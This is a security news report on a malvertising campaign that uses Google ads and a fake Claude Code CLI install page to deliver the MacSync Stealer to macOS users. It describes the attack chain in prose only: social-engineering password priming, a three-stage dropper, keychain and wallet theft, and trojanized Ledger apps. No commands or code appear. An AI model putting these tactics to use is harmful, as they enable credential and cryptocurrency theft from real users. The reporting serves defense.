Weaponized Google Ads Deliver MacSync Stealer, Targeting macOS Credentials and Crypto Wallets
A malicious Google ad campaign is distributing the MacSync Stealer malware via a fake Claude Code CLI installer, aiming to harvest macOS credentials and crypto seed phrases.

A sophisticated attack campaign is leveraging weaponized Google ads to distribute the MacSync Stealer malware on macOS systems. The campaign lures unsuspecting users by impersonating Anthropic’s Claude Code CLI, a popular tool for developers. Researchers at Beelzebub Labs discovered the operation after analyzing a suspicious terminal command, revealing a multi-stage attack designed to steal credentials and, critically, crypto seed phrases from users of Ledger hardware wallets.
The initial vector is a sponsored Google search result for terms like "claude code mac install." This result directs users to a convincing fake install page hosted on Google Sites, which closely mimics Anthropic's official branding. To further deceive victims, the page includes a fabricated download counter and a one-click button to copy a malicious terminal command. The use of Google Sites is a deliberate tactic, as its JavaScript-rendered content can evade automated security scanners, making the malicious link appear safe while remaining fully convincing to human users.
The attack chain is meticulously crafted to build trust and bypass user suspicion. Before a victim executes any command, the fake page provides a "New to Terminal?" guide that includes a simulated installation process. This guide intentionally primes the user to expect and enter their administrator password, making a subsequent, genuine-looking password prompt appear normal rather than suspicious. Once the password is provided, it is used to unlock the macOS keychain and extract sensitive credentials.
The malware, identified as MacSync Stealer version 1.1.2, employs a three-stage dropper. The initial command, once executed, silently downloads and runs a script that fetches the main payload. This payload then forces-quit the Terminal application to erase its tracks before initiating the credential harvesting process. The AppleScript-based stealer is designed to be stealthy, redirecting all output to prevent visible signs of execution.
With the stolen administrator password, MacSync Stealer systematically harvests a wide array of sensitive information. This includes saved logins from numerous Chromium-based and Firefox browsers, cryptocurrency wallet extensions and desktop applications, SSH keys, cloud configuration files (AWS, Kubernetes), Telegram sessions, Safari history, and Apple Notes. The malware also scans for sensitive documents within common user directories like Desktop, Documents, and Downloads.
A particularly dangerous aspect of this campaign is its ability to target cryptocurrency holders. If a user has installed the Ledger Live or Ledger Wallet applications, the malware silently replaces the legitimate application code with a trojanized version. Upon the next launch of these applications, the user will be prompted to enter their crypto seed phrase, which is then captured by the attackers, leading to the potential theft of all associated funds.
While the attack chain is designed to be seamless, certain user actions can break the chain. For instance, if a victim reboots their system or closes their laptop before the data exfiltration or wallet trojanization stages are complete, they may escape the full impact of the compromise. However, the initial credential theft and keychain compromise can still occur even if these later stages are interrupted.
This campaign highlights the evolving tactics of cybercriminals who are increasingly using deceptive advertising and social engineering to distribute sophisticated malware. The targeting of developer tools like Claude Code and critical applications like crypto wallets underscores the high-value targets these attackers are pursuing, making vigilance and robust security practices essential for all macOS users.